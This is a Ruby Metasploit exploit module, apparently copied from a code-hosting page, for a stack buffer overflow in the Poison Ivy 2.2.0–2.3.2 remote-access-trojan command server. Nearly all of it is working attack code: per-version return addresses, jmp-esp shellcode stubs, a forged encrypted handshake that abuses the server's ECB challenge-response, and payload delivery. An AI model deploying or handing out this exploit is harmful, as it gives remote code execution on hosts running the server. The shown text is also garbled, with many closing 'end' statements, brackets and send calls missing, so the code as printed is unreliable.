187 lines
6.5 KiB
187 lines
6.5 KiB
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
'Name' => 'Poison Ivy Server Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server communication.
'License' => MSF_LICENSE,
'Author' =>
'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi', # Exploit and Metasploit module
'juan vazquez', # Testing and little of Metasploit-fu
'Jos Wetzels' # Added support for Poison Ivy 2.2.0 to 2.3.1, removed need for brute forcing by (ab)using C&C challenge-response as encryption oracle
'References' =>
[ 'OSVDB', '83774' ],
[ 'EDB', '19613' ],
[ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
[ 'URL', 'http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/' ],
'DisclosureDate' => '2012-06-24',
'DefaultOptions' =>
'EXITFUNC' => 'thread',
'Payload' =>
'StackAdjustment' => -4000,
'Space' => 10000
'Platform' => 'win',
'Targets' =>
'Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1',
'Ret' => 0x00425E5D, # jmp esp from "Poison Ivy 2.2.0.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x8069,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\xFC\x7F\x00\x00\xff\xe4" # sub esp,0x7FFC # jmp esp
'Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1',
'Ret' => 0x00442749, # jmp esp from "Poison Ivy 2.3.0.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x8069,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\xFC\x7F\x00\x00\xff\xe4" # sub esp,0x7FFC # jmp esp
'Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1',
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.1.exe" and "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
'DefaultTarget' => 2
def check
# camellia block size
block_size = 16
# number of blocks in challenge
block_count = 16
challenge = ("\x00" * block_size * block_count)
indicator = {}
# 0x0000113e as first 4 bytes on PI 2.1.0
indicator[[0x0000113e].pack('V')] = '2.1.0'
# 0x00001212 as first 4 bytes on PI 2.1.1
indicator[[0x00001212].pack('V')] = '2.1.1'
# 0x000013f6 as first 4 bytes on PI 2.1.2
indicator[[0x000013f6].pack('V')] = '2.1.2'
# 0x000013e0 as 4 bytes after challenge on PI 2.2.0
indicator[[0x000013e0].pack('V')] = '2.2.0'
# 0x00001470 as 4 bytes after challenge on PI 2.3.0
indicator[[0x00001470].pack('V')] = '2.3.0'
# 0x000015D0 as 4 bytes after challenge on PI 2.3.1/2.3.2
indicator[[0x000015D0].pack('V')] = '2.3.1/2.3.2'
response = sock.get_once(256)
if response && response.length == 256
# Poison Ivy >= 2.2.0 Challenge Response uses Camellia in ECB mode which means identical plaintext blocks
# map to identical ciphertext blocks. A challenge composed of identical blocks will thus result in a response of identical blocks.
first_block = response[0, 16]
(1..15).each do |index|
unless response[index * 16, 16] == first_block
vprint_status("Response doesn't match Poison Ivy Challenge-Response format.")
return Exploit::CheckCode::Safe
response = sock.get_once(4)
if response && response.length == 4
if indicator.key?(response)
version = indicator[response]
vprint_status("Poison Ivy C&C version #{version} detected.")
return Exploit::CheckCode::Appears
vprint_status("Response doesn't match Poison Ivy Challenge-Response protocol.")
def exploit
# Handshake
print_status('Performing handshake...')
# plaintext header
plaintext_header = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# crafted challenge (first 32 bytes is our plaintext header), abuse challenge-response as encryption oracle
challenge = plaintext_header + ("\x00" * (256 - 32))
# response = encrypt(challenge, key)
response = sock.get_once
# since encryption is done using Camellia in ECB mode, we can cut and paste the first 32 bytes (our header inside the crafted challenge) without knowing the key
encrypted_header = response[0, 32]
# Don't change the nulls, or it might not work
xploit = ''
xploit << encrypted_header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack('V') # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack('V') # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status('Sending exploit...')
* ROP version of exploit(): Has been discarded at the moment because of two reasons:
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter